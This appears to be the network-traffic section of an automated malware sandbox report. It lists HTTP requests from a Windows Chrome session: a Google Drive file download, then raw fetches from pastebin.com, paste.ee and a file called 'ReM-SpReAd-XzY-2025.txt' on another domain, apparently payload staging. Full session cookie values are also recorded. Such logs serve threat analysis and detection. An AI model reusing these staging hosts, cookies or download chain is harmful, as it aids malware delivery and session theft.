              Source: global trafficHTTP traffic detected: GET /viewer2/prod-02/archive?ck=drive&ds=APznzaaNbpEe25LXChfwaWxJy58bQE5feWN-tR9kwE5BYOTr4B_P9nBVSRnQhRZYlGjMb37Au674rgK6NnRgmpWGs8YKVybaxRb8C9gqX9K9TCrmVZtYveGE_OLnXJdJFQ_3fb2EPqJZBf36fSppVpBSe4_LiGWhtdKtndis4RfbTHjqgkgnwrK0-2BhZZIYs-7RTjWfBiGa5rgNuTPCT2QnarUMxfz92DXxJPDQ_JvRZpGqxqSEECBX0zBbKliJMyO9gh9QMU0wU0069afIuYHe50XBKjymHqPYQ0PFZJ_g0S8QWThegkAKT_xAJr9BS1l4HJO0gYvBX6YT-pCCSPdBs8St56EqnG01K4mSW2LBiNjKFYeNkBnXCItUXTmMrvDd7jHgp8bBmQrohkoqRqVP-4N89s1thSPweOLWTtTEiTHTjvLk62I%3D&authuser=0&page=0 HTTP/1.1Host: drive.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=QkA3za_f2r-VoMsaPg26kbve9O8rGOk0JJvB6qrnlcwJliWCyi6P-wcGPf-3vlzO_a1f-8gHSrVEGFShZWkWqM8j4XHXrPmZtv2BOILdUi_vBZXh94kQ8-x5m8KQOQQCQM6e4MzzCN8Colyq6xhG3THFVjWm_zyucEHgCXQmePQp0es19UuyBU5ZVGMTXK42qw
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=QkA3za_f2r-VoMsaPg26kbve9O8rGOk0JJvB6qrnlcwJliWCyi6P-wcGPf-3vlzO_a1f-8gHSrVEGFShZWkWqM8j4XHXrPmZtv2BOILdUi_vBZXh94kQ8-x5m8KQOQQCQM6e4MzzCN8Colyq6xhG3THFVjWm_zyucEHgCXQmePQp0es19UuyBU5ZVGMTXK42qw
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=client/exm=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_1 HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=QkA3za_f2r-VoMsaPg26kbve9O8rGOk0JJvB6qrnlcwJliWCyi6P-wcGPf-3vlzO_a1f-8gHSrVEGFShZWkWqM8j4XHXrPmZtv2BOILdUi_vBZXh94kQ8-x5m8KQOQQCQM6e4MzzCN8Colyq6xhG3THFVjWm_zyucEHgCXQmePQp0es19UuyBU5ZVGMTXK42qw
              Source: global trafficHTTP traffic detected: GET /16/type/Unknown/undefined HTTP/1.1Host: drive-thirdparty.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCNy9zQEIucrNAQi2y80BCOnSzQEIitPNAQjB1M0BCM/WzQEI49bNAQiO180BCKfYzQEIutjNAQj5wNQVGLi/zQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://drive.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=Tt-Mh1rCaZfe8e5AHbrV5AfdwhzjJNdQ8F9XfJm9nUdL2cNlUduqkTFDeA-xczmVSZDcIqZSDygmhyOv1AJUMlSb2e1Z_3tiZe_f_EpYsJZ0hqo2YXkvM_y3dNYSa2vylaWiU28GIWJMxWUgG5ov6CTlwRi6VKDeb5kqwXH8vkNArVCwom-AnWTiEbFwuadRpMYIx1rTOg
              Source: global trafficHTTP traffic detected: GET /js/googleapis.proxy.js?onload=startup HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCNy9zQEIucrNAQi2y80BCOnSzQEIitPNAQjB1M0BCM/WzQEI49bNAQiO180BCKfYzQEIutjNAQj5wNQVGLi/zQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://content.googleapis.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=CPSldwv5PqHR3r_FibngBDu0Iwi7PICWYySNvcvJBxVsAnvQ5Egmt4W6adR6NJtalGJjk6j2pXo2HZsme1Pm8LioHUaQs7bntGOTHDEycQx86tPt6yjhZJJjzaE1afk95yGodIxSvKYEHeb40KsddLiztZNveQL4MTcaSTYGL507RKX-_6roNfcmhgUKxScLbqKHY3Br7Q
              Source: global trafficHTTP traffic detected: GET /16/type/Unknown/undefined HTTP/1.1Host: drive-thirdparty.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=I2PCSUnxrNJT1OyZUWZ6xxUdGKze04aeLkkkZsCXo6VLEVF7gsuJD_19L9yIIMt-eJJDTZ0SDsS2nKQuJXNND6GXa40q9e967sBUZ2gqxtsuZdzQqnYDaMENZnrVQahCtTG1lK-cx2oQStfV0_N7MWJolcJfSulfW2tjYV6eXMUueeDdxrck0evcZVH9sDY6pjX1mJWaaw
              Source: global trafficHTTP traffic detected: GET /images/branding/googlelogo/1x/googlelogo_color_150x54dp.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCNy9zQEIucrNAQi2y80BCOnSzQEIitPNAQjB1M0BCM/WzQEI49bNAQiO180BCKfYzQEIutjNAQj5wNQVGLi/zQEY9snNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=CPSldwv5PqHR3r_FibngBDu0Iwi7PICWYySNvcvJBxVsAnvQ5Egmt4W6adR6NJtalGJjk6j2pXo2HZsme1Pm8LioHUaQs7bntGOTHDEycQx86tPt6yjhZJJjzaE1afk95yGodIxSvKYEHeb40KsddLiztZNveQL4MTcaSTYGL507RKX-_6roNfcmhgUKxScLbqKHY3Br7Q
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=googleapis_proxy/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0?le=scs HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCNy9zQEIucrNAQi2y80BCOnSzQEIitPNAQjB1M0BCM/WzQEI49bNAQiO180BCKfYzQEIutjNAQj5wNQVGLi/zQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://content.googleapis.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=CPSldwv5PqHR3r_FibngBDu0Iwi7PICWYySNvcvJBxVsAnvQ5Egmt4W6adR6NJtalGJjk6j2pXo2HZsme1Pm8LioHUaQs7bntGOTHDEycQx86tPt6yjhZJJjzaE1afk95yGodIxSvKYEHeb40KsddLiztZNveQL4MTcaSTYGL507RKX-_6roNfcmhgUKxScLbqKHY3Br7Q
              Source: global trafficHTTP traffic detected: GET /js/googleapis.proxy.js?onload=startup HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=CPSldwv5PqHR3r_FibngBDu0Iwi7PICWYySNvcvJBxVsAnvQ5Egmt4W6adR6NJtalGJjk6j2pXo2HZsme1Pm8LioHUaQs7bntGOTHDEycQx86tPt6yjhZJJjzaE1afk95yGodIxSvKYEHeb40KsddLiztZNveQL4MTcaSTYGL507RKX-_6roNfcmhgUKxScLbqKHY3Br7Q
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=NU2GnIKbIWvOe7FyykBo-zhNePHLN9hyiMFJYMZz-fiYqLPInTpDn7PrxmyUvkDciFeEgZ5VJSBp1wUlVETK4DMcbSmukddZgdlBB2BXb6nfIHBl_XnUTcE4EdEOW-3Ur3s8VZBz6sNr7y4MlShyzh9B8dqr1fLiWYHXstK_74ONKuo03jhdkUiEQsKclOhnOY-UaOZdQw
              Source: global trafficHTTP traffic detected: GET /uc?id=1FVDnmU54G6_GaADSmojqRgpCVK0Y1U9s&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCNy9zQEIucrNAQi2y80BCOnSzQEIitPNAQjB1M0BCM/WzQEI49bNAQiO180BCKfYzQEIutjNAQj5wNQVGLi/zQEY9snNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://drive.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=CPSldwv5PqHR3r_FibngBDu0Iwi7PICWYySNvcvJBxVsAnvQ5Egmt4W6adR6NJtalGJjk6j2pXo2HZsme1Pm8LioHUaQs7bntGOTHDEycQx86tPt6yjhZJJjzaE1afk95yGodIxSvKYEHeb40KsddLiztZNveQL4MTcaSTYGL507RKX-_6roNfcmhgUKxScLbqKHY3Br7Q
              Source: global trafficHTTP traffic detected: GET /images/branding/googlelogo/1x/googlelogo_color_150x54dp.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=CPSldwv5PqHR3r_FibngBDu0Iwi7PICWYySNvcvJBxVsAnvQ5Egmt4W6adR6NJtalGJjk6j2pXo2HZsme1Pm8LioHUaQs7bntGOTHDEycQx86tPt6yjhZJJjzaE1afk95yGodIxSvKYEHeb40KsddLiztZNveQL4MTcaSTYGL507RKX-_6roNfcmhgUKxScLbqKHY3Br7Q
              Source: global trafficHTTP traffic detected: GET /download?id=1FVDnmU54G6_GaADSmojqRgpCVK0Y1U9s&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCNy9zQEIucrNAQi2y80BCOnSzQEIitPNAQjB1M0BCM/WzQEI49bNAQiO180BCKfYzQEIutjNAQj5wNQVGLi/zQEY9snNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.149"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.149", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.149"Referer: https://drive.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=CPSldwv5PqHR3r_FibngBDu0Iwi7PICWYySNvcvJBxVsAnvQ5Egmt4W6adR6NJtalGJjk6j2pXo2HZsme1Pm8LioHUaQs7bntGOTHDEycQx86tPt6yjhZJJjzaE1afk95yGodIxSvKYEHeb40KsddLiztZNveQL4MTcaSTYGL507RKX-_6roNfcmhgUKxScLbqKHY3Br7Q
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=CPSldwv5PqHR3r_FibngBDu0Iwi7PICWYySNvcvJBxVsAnvQ5Egmt4W6adR6NJtalGJjk6j2pXo2HZsme1Pm8LioHUaQs7bntGOTHDEycQx86tPt6yjhZJJjzaE1afk95yGodIxSvKYEHeb40KsddLiztZNveQL4MTcaSTYGL507RKX-_6roNfcmhgUKxScLbqKHY3Br7Q
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=googleapis_proxy/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0?le=scs HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=CPSldwv5PqHR3r_FibngBDu0Iwi7PICWYySNvcvJBxVsAnvQ5Egmt4W6adR6NJtalGJjk6j2pXo2HZsme1Pm8LioHUaQs7bntGOTHDEycQx86tPt6yjhZJJjzaE1afk95yGodIxSvKYEHeb40KsddLiztZNveQL4MTcaSTYGL507RKX-_6roNfcmhgUKxScLbqKHY3Br7Q
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=CPSldwv5PqHR3r_FibngBDu0Iwi7PICWYySNvcvJBxVsAnvQ5Egmt4W6adR6NJtalGJjk6j2pXo2HZsme1Pm8LioHUaQs7bntGOTHDEycQx86tPt6yjhZJJjzaE1afk95yGodIxSvKYEHeb40KsddLiztZNveQL4MTcaSTYGL507RKX-_6roNfcmhgUKxScLbqKHY3Br7Q
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=CPSldwv5PqHR3r_FibngBDu0Iwi7PICWYySNvcvJBxVsAnvQ5Egmt4W6adR6NJtalGJjk6j2pXo2HZsme1Pm8LioHUaQs7bntGOTHDEycQx86tPt6yjhZJJjzaE1afk95yGodIxSvKYEHeb40KsddLiztZNveQL4MTcaSTYGL507RKX-_6roNfcmhgUKxScLbqKHY3Br7Q
              Source: global trafficHTTP traffic detected: GET /download?id=1FVDnmU54G6_GaADSmojqRgpCVK0Y1U9s&export=download&confirm=t&uuid=5c8bcfca-a6f9-42f4-8d03-a302c0a9201f HTTP/1.1Host: drive.usercontent.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.149"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.149", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.149"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=CPSldwv5PqHR3r_FibngBDu0Iwi7PICWYySNvcvJBxVsAnvQ5Egmt4W6adR6NJtalGJjk6j2pXo2HZsme1Pm8LioHUaQs7bntGOTHDEycQx86tPt6yjhZJJjzaE1afk95yGodIxSvKYEHeb40KsddLiztZNveQL4MTcaSTYGL507RKX-_6roNfcmhgUKxScLbqKHY3Br7Q
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=CPSldwv5PqHR3r_FibngBDu0Iwi7PICWYySNvcvJBxVsAnvQ5Egmt4W6adR6NJtalGJjk6j2pXo2HZsme1Pm8LioHUaQs7bntGOTHDEycQx86tPt6yjhZJJjzaE1afk95yGodIxSvKYEHeb40KsddLiztZNveQL4MTcaSTYGL507RKX-_6roNfcmhgUKxScLbqKHY3Br7Q
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=CPSldwv5PqHR3r_FibngBDu0Iwi7PICWYySNvcvJBxVsAnvQ5Egmt4W6adR6NJtalGJjk6j2pXo2HZsme1Pm8LioHUaQs7bntGOTHDEycQx86tPt6yjhZJJjzaE1afk95yGodIxSvKYEHeb40KsddLiztZNveQL4MTcaSTYGL507RKX-_6roNfcmhgUKxScLbqKHY3Br7Q
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=CPSldwv5PqHR3r_FibngBDu0Iwi7PICWYySNvcvJBxVsAnvQ5Egmt4W6adR6NJtalGJjk6j2pXo2HZsme1Pm8LioHUaQs7bntGOTHDEycQx86tPt6yjhZJJjzaE1afk95yGodIxSvKYEHeb40KsddLiztZNveQL4MTcaSTYGL507RKX-_6roNfcmhgUKxScLbqKHY3Br7Q
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=CPSldwv5PqHR3r_FibngBDu0Iwi7PICWYySNvcvJBxVsAnvQ5Egmt4W6adR6NJtalGJjk6j2pXo2HZsme1Pm8LioHUaQs7bntGOTHDEycQx86tPt6yjhZJJjzaE1afk95yGodIxSvKYEHeb40KsddLiztZNveQL4MTcaSTYGL507RKX-_6roNfcmhgUKxScLbqKHY3Br7Q
              Source: global trafficHTTP traffic detected: GET /raw/bYrRPs5M HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /d/QBg5bdM9/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/SNtceP04 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /d/QCV6zpQe/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ReM-SpReAd-XzY-2025.txt HTTP/1.1Host: demeurerhonealpes.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/rTh3f4Xw HTTP/1.1Host: pastebin.com
              Source: global trafficHTTP traffic detected: GET /raw/bYrRPs5M HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /d/QBg5bdM9/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /d/vsnKLPWH/0 HTTP/1.1Host: paste.ee
